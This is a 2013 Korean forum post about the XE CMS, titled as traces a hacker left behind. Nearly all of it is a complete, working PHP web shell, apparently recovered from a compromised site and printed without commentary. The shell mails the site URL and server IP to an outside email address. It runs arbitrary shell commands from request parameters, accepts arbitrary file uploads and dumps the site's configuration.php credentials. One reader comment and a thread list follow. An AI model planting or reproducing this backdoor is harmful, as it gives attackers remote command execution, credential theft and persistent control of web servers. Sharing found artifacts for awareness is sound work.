포럼

해커의 흔적 2

2013.10.30 09:00

error_reporting(0);
$target = $_SERVER["HTTP_HOST"];
$cr0t = $_SERVER["REQUEST_URI"];
$bodymsg = "JCE Kang! \n$target$cr0t";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
mail("pamela.wal@live.co.uk", "$bodymsg","Cr0t http://$target$cr0t\n$security\nIP Server = $serper\n");

$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>+[ Powered by KcB ]+</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\\')){
if($u!=strlen($cwd)-1){
return $cwd.'\\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}

if(isset($_GET['read'])){
$conf = file_get_contents("../../configuration.php");
echo $conf;
}

이 게시물을

댓글 1

도라미

2013.11.03 21:35

결제 모듈에 흔적을 남긴건가요?

좋아요 댓글 신고

목록

글쓴이	제목	최종 글
엘카	해커의 흔적 2 [1]	2013.11.03 _by 도라미
KANTSOFT	웹 개발자를 위한 자바스크립트 UI 라이브러리 [10]	2013.11.05 _by 도라미
엘카	인증메일 애드온 공개합니다. (회원 정보 변경시 메일인증) [21]	2013.11.05 _by socialskyo
socialskyo	[논란글 아님] XE 와 오픈소스 그리고 고객 [12]	2020.03.14 _by sol
SMaker	XE의 rewrite mod에 관하여 [3]	2013.11.06 _by sol
누리안	CDN 서비스 종료 결정에 대한 유감 [13]	2013.11.06 _by 銀童
모앱	xe 1.7.3.6 소셜 XE 작동하시는불들께 도움을 청합니다. [3]	2013.11.06 _by 푸시아
uxfactory	XE에 대한 새로운 글이 올라왔군요.
Xiso	javascript mobile framework, 당신의 선택은?! [2]	2013.11.07 _by Garon
우진홈	XE가 비판 받는 이유! [22]	2020.03.14 _by 정도의길을걷기싫다
난다날아	버그 신고는 구글 코드를 이용해주세요. [15]	2013.11.07 _by 구름나무바위
whitemind	정말 마지막으로 질문드립니다.. 관리자만 글 등록이 되고 일반 유저들은 게시글 등록이 안됩니다. [11]	2013.11.07 _by whitemind
Canto	새글 알림 애드온 js 출력 문제 [9]	2013.11.08 _by Canto
황비	Xe가 진정한 오픈소스로 거듭나기 위해서는... [8]	2020.03.14 _by BNU
socialskyo	그냥 푸념 하나 할게요. [1]	2020.03.14 _by BNU
황비	Xe 앞날은 어떻게 되는 건가요? [26]	2020.03.14 _by 생까는즐거움
CMD	회원 관리 애드온 [30]	2013.11.10 _by MoTo
헨느	Elkha 님의 압축XE 아직 동작하나요? [1]	2013.11.10 _by 라미아스튜디오
CI	특별한 이유가 없다면 SSH로 접속 후 업로드 하시는게 [6]	2013.11.11 _by 짤막한글
socialskyo	XE 보안??? 구글 검색하다 보니 특정사이트 가 다 보여요... [6]	2013.11.11 _by CI

태그 쓰기